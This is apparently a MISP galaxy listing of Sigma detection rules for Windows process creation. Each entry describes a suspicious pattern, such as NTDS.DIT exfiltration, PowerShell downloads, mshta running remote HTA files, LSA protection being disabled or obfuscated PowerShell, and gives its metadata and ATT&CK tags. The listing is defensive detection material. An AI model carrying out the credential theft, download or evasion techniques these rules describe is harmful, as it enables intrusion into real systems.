External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/29
falsepositive ['Unknown']
filename proc_creation_win_lolbin_unregmp2.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspicious Process Patterns NTDS.DIT Exfil

Detects suspicious process patterns used in NTDS.DIT exfiltration

Internal MISP references

UUID 8bc64091-6875-4881-aaf9-7bd25b5dda08 which can be used as unique global reference for Suspicious Process Patterns NTDS.DIT Exfil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/11
falsepositive ['Unknown']
filename proc_creation_win_susp_ntds.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Procdump Execution

Detects usage of the SysInternals Procdump utility

Internal MISP references

UUID 2e65275c-8288-4ab4-aeb7-6274f58b6b20 which can be used as unique global reference for Procdump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/16
falsepositive ['Legitimate use of procdump by a developer or administrator']
filename proc_creation_win_sysinternals_procdump.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

LSA PPL Protection Disabled Via Reg.EXE

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

Internal MISP references

UUID 8c0eca51-0f88-4db2-9183-fdfb10c703f9 which can be used as unique global reference for LSA PPL Protection Disabled Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/22
falsepositive ['Unlikely']
filename proc_creation_win_reg_lsa_ppl_protection_disabled.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.010']
Related clusters

To see the related clusters, click here.

PowerShell Download Pattern

Detects a Powershell process that contains download commands in its command line string

Internal MISP references

UUID 3b6ab547-8ec2-4991-b9d2-2b06702a48d7 which can be used as unique global reference for PowerShell Download Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_patterns.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via MSOHTMED.EXE

Detects usage of "MSOHTMED" to download arbitrary files

Internal MISP references

UUID 459f2f98-397b-4a4a-9f47-6a5ec2f1c69d which can be used as unique global reference for Arbitrary File Download Via MSOHTMED.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_msohtmed_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

Internal MISP references

UUID 10344bb3-7f65-46c2-b915-2d00d47be5b0 which can be used as unique global reference for IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Unknown']
filename proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion']

Potential WinAPI Calls Via CommandLine

Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec

Internal MISP references

UUID ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 which can be used as unique global reference for Potential WinAPI Calls Via CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/06
falsepositive ['Unknown']
filename proc_creation_win_susp_inline_win_api_access.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.

Internal MISP references

UUID e9b61244-893f-427c-b287-3e708f321c6b which can be used as unique global reference for Potential Privilege Escalation Using Symlink Between Osk and Cmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename proc_creation_win_cmd_mklink_osk_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008']
Related clusters

To see the related clusters, click here.

Local Groups Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Internal MISP references

UUID 164eda96-11b2-430b-85ff-6a265c15bf32 which can be used as unique global reference for Local Groups Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/12
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_group.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1069.001']
Related clusters

To see the related clusters, click here.

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet

Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet

Internal MISP references

UUID c8a180d6-47a3-4345-a609-53f9c3d834fc which can be used as unique global reference for Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/10
falsepositive ['Administrative activity']
filename proc_creation_win_powershell_get_localgroup_member_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087.001']
Related clusters

To see the related clusters, click here.

Uncommon System Information Discovery Via Wmic.EXE

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

Internal MISP references

UUID 9d5a1274-922a-49d0-87f3-8c653483b909 which can be used as unique global reference for Uncommon System Information Discovery Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2023/01/26
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_system_info_uncommon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Remote File Download Via Findstr.EXE

Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.

Internal MISP references

UUID 587254ee-a24b-4335-b3cd-065c0f1f4baa which can be used as unique global reference for Remote File Download Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Unknown']
filename proc_creation_win_findstr_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1564.004', 'attack.t1552.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Java Running with Remote Debugging

Detects a JAVA process running with remote debugging allowing more than just localhost to connect

Internal MISP references

UUID 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 which can be used as unique global reference for Java Running with Remote Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_java_remote_debugging.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1203', 'attack.execution']
Related clusters

To see the related clusters, click here.

Python Spawning Pretty TTY on Windows

Detects python spawning a pretty tty

Internal MISP references

UUID 480e7e51-e797-47e3-8d72-ebfce65b6d8d which can be used as unique global reference for Python Spawning Pretty TTY on Windows in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nextron Systems
creation_date 2022/06/03
falsepositive ['Unknown']
filename proc_creation_win_python_pty_spawn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Replace.exe Usage

Detects the use of Replace.exe which can be used to replace file with another file

Internal MISP references

UUID 9292293b-8496-4715-9db6-37028dcda4b3 which can be used as unique global reference for Replace.exe Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/06
falsepositive ['Unknown']
filename proc_creation_win_lolbin_replace.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Disabled IE Security Features

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

Internal MISP references

UUID fb50eb7a-5ab1-43ae-bcc9-091818cb8424 which can be used as unique global reference for Disabled IE Security Features in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/06/19
falsepositive ['Unknown']
filename proc_creation_win_powershell_disable_ie_features.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Process Proxy Execution Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

Internal MISP references

UUID 45239e6a-b035-4aaf-b339-8ad379fcb67e which can be used as unique global reference for Process Proxy Execution Via Squirrel.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2022/06/09
falsepositive ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)']
filename proc_creation_win_squirrel_proxy_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Indirect Command Execution By Program Compatibility Wizard

Detect indirect command execution via Program Compatibility Assistant pcwrun.exe

Internal MISP references

UUID b97cd4b1-30b8-4a9d-bd72-6293928d52bc which can be used as unique global reference for Indirect Command Execution By Program Compatibility Wizard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author A. Sungurov , oscd.community
creation_date 2020/10/12
falsepositive ["Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", 'Legit usage of scripts']
filename proc_creation_win_lolbin_pcwrun.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']
Related clusters

To see the related clusters, click here.

Tap Installer Execution

Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques

Internal MISP references

UUID 99793437-3e16-439b-be0f-078782cf953d which can be used as unique global reference for Tap Installer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, Ian Davis, oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate OpenVPN TAP installation']
filename proc_creation_win_tapinstall_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Suspicious IIS Module Registration

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

Internal MISP references

UUID 043c4b8b-3a54-4780-9682-081cb6b8185c which can be used as unique global reference for Suspicious IIS Module Registration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Microsoft (idea)
creation_date 2022/08/04
falsepositive ['Administrative activity']
filename proc_creation_win_iis_susp_module_registration.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.004']
Related clusters

To see the related clusters, click here.

LOL-Binary Copied From System Directory

Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.

Internal MISP references

UUID f5d19838-41b5-476c-98d8-ba8af4929ee2 which can be used as unique global reference for LOL-Binary Copied From System Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/29
falsepositive ['Unknown']
filename proc_creation_win_susp_copy_system_dir_lolbin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Desktop Background Change Using Reg.EXE

Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 8cbc9475-8d05-4e27-9c32-df960716c701 which can be used as unique global reference for Potentially Suspicious Desktop Background Change Using Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023/12/21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename proc_creation_win_reg_desktop_background_change.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Powershell Base64 Encoded MpPreference Cmdlet

Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV

Internal MISP references

UUID c6fb44c6-71f5-49e6-9462-1425d328aee3 which can be used as unique global reference for Powershell Base64 Encoded MpPreference Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/04
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_mppreference.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Parent in Public Folder Suspicious Process

This rule detects suspicious processes with parent images located in the C:\Users\Public folder

Internal MISP references

UUID 69bd9b97-2be2-41b6-9816-fb08757a4d1a which can be used as unique global reference for Parent in Public Folder Suspicious Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/25
falsepositive ['Unknown']
filename proc_creation_win_susp_execution_from_public_folder_as_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1564', 'attack.t1059']
Related clusters

To see the related clusters, click here.

New Service Creation Using PowerShell

Detects the creation of a new service using powershell.

Internal MISP references

UUID c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 which can be used as unique global reference for New Service Creation Using PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2023/02/20
falsepositive ['Legitimate administrator or user creates a service for legitimate reasons.', 'Software installation']
filename proc_creation_win_powershell_create_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

OpenWith.exe Executes Specified Binary

The OpenWith.exe executes other binary

Internal MISP references

UUID cec8e918-30f7-4e2d-9bfa-a59cc97ae60f which can be used as unique global reference for OpenWith.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community (rule), @harr0ey (idea)
creation_date 2019/10/12
falsepositive ['Unknown']
filename proc_creation_win_lolbin_openwith.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Scheduled Task Executing Encoded Payload from Registry

Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

Internal MISP references

UUID c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78 which can be used as unique global reference for Scheduled Task Executing Encoded Payload from Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/12
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_reg_loader_encoded.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call

Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"

Internal MISP references

UUID 9c0295ce-d60d-40bd-bd74-84673b7592b1 which can be used as unique global reference for Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2022/03/01
falsepositive ['Unlikely']
filename proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1059.001', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Schtasks From Env Var Folder

Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware

Internal MISP references

UUID 81325ce1-be01-4250-944f-b4789644556f which can be used as unique global reference for Suspicious Schtasks From Env Var Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/21
falsepositive ['Benign scheduled tasks creations or executions that happen often during software installations', 'Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders']
filename proc_creation_win_schtasks_env_folder.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Potential File Overwrite Via Sysinternals SDelete

Detects the use of SDelete to erase a file not the free space

Internal MISP references

UUID a4824fca-976f-4964-b334-0621379e84c4 which can be used as unique global reference for Potential File Overwrite Via Sysinternals SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/06/03
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_sdelete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

PowerShell Script Change Permission Via Set-Acl

Detects PowerShell execution to set the ACL of a file or a folder

Internal MISP references

UUID bdeb2cff-af74-4094-8426-724dc937f20a which can be used as unique global reference for PowerShell Script Change Permission Via Set-Acl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_set_acl.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential LethalHTA Technique Execution

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

Internal MISP references

UUID ed5d72a6-f8f4-479d-ba79-02f6a80d7471 which can be used as unique global reference for Potential LethalHTA Technique Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/06/07
falsepositive ['Unknown']
filename proc_creation_win_mshta_lethalhta_technique.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

Cloudflared Portable Execution

Detects the execution of the "cloudflared" binary from a non standard location.

Internal MISP references

UUID fadb84f0-4e84-4f6d-a1ce-9ef2bffb6ccd which can be used as unique global reference for Cloudflared Portable Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Legitimate usage of Cloudflared portable versions']
filename proc_creation_win_cloudflared_portable_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Remote Access Tool - LogMeIn Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID d85873ef-a0f8-4c48-a53a-6b621f11729d which can be used as unique global reference for Remote Access Tool - LogMeIn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/11
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_logmein.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Visual Studio NodejsTools PressAnyKey Renamed Execution

Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries

Internal MISP references

UUID 65c3ca2c-525f-4ced-968e-246a713d164f which can be used as unique global reference for Visual Studio NodejsTools PressAnyKey Renamed Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/04/11
falsepositive ['Unknown']
filename proc_creation_win_renamed_pressanykey.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation COMPRESS OBFUSCATION

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

Internal MISP references

UUID 7eedcc9d-9fdb-4d94-9c54-474e8affc0c7 which can be used as unique global reference for Invoke-Obfuscation COMPRESS OBFUSCATION in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Insecure Proxy/DOH Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "insecure" flag over proxy or DOH.

Internal MISP references

UUID 2c1486f5-02e8-4f86-9099-b97f2da4ed77 which can be used as unique global reference for Insecure Proxy/DOH Transfer Via Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Access to badly maintained internal or development systems']
filename proc_creation_win_curl_insecure_porxy_or_doh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

MpiExec Lolbin

Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary

Internal MISP references

UUID 729ce0ea-5d8f-4769-9762-e35de441586d which can be used as unique global reference for MpiExec Lolbin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_lolbin_mpiexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

HackTool - F-Secure C3 Load by Rundll32

F-Secure C3 produces DLLs with a default exported StartNodeRelay function.

Internal MISP references

UUID b18c9d4c-fac9-4708-bd06-dd5bfacf200f which can be used as unique global reference for HackTool - F-Secure C3 Load by Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alfie Champion (ajpc500)
creation_date 2021/06/02
falsepositive ['Unknown']
filename proc_creation_win_hktl_c3_rundll32_pattern.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011']
Related clusters

To see the related clusters, click here.

Potential Arbitrary DLL Load Using Winword

Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.

Internal MISP references

UUID f7375e28-5c14-432f-b8d1-1db26c832df3 which can be used as unique global reference for Potential Arbitrary DLL Load Using Winword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_office_winword_dll_load.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE

Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe

Internal MISP references

UUID b6e04788-29e1-4557-bb14-77f761848ab8 which can be used as unique global reference for Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Unknown']
filename proc_creation_win_powershell_download_susp_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Invoke-Obfuscation Obfuscated IEX Invocation

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block

Internal MISP references

UUID 4bf943c6-5146-4273-98dd-e958fd1e3abf which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Registry Modification From ADS Via Regini.EXE

Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.

Internal MISP references

UUID 77946e79-97f1-45a2-84b4-f37b5c0d8682 which can be used as unique global reference for Suspicious Registry Modification From ADS Via Regini.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Eli Salem, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_regini_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Potential Download/Upload Activity Using Type Command

Detects usage of the "type" command to download/upload data from WebDAV server

Internal MISP references

UUID aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f which can be used as unique global reference for Potential Download/Upload Activity Using Type Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/14
falsepositive ['Unknown']
filename proc_creation_win_lolbin_type.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Remotely Hosted HTA File Executed Via Mshta.EXE

Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file

Internal MISP references

UUID b98d0db6-511d-45de-ad02-e82a98729620 which can be used as unique global reference for Remotely Hosted HTA File Executed Via Mshta.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/08
falsepositive ['Unknown']
filename proc_creation_win_mshta_http.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

PowerShell Set-Acl On Windows Folder

Detects PowerShell scripts to set the ACL to a file in the Windows folder

Internal MISP references

UUID 0944e002-e3f6-4eb5-bf69-3a3067b53d73 which can be used as unique global reference for PowerShell Set-Acl On Windows Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/18
falsepositive ['Unknown']
filename proc_creation_win_powershell_set_acl_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Potential Memory Dumping Activity Via LiveKD

Detects execution of LiveKD based on PE metadata or image name

Internal MISP references

UUID a85f7765-698a-4088-afa0-ecfbf8d01fa4 which can be used as unique global reference for Potential Memory Dumping Activity Via LiveKD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Administration and debugging activity (must be investigated)']
filename proc_creation_win_sysinternals_livekd_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Internal MISP references

UUID 6e22722b-dfb1-4508-a911-49ac840b40f8 which can be used as unique global reference for Suspicious Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
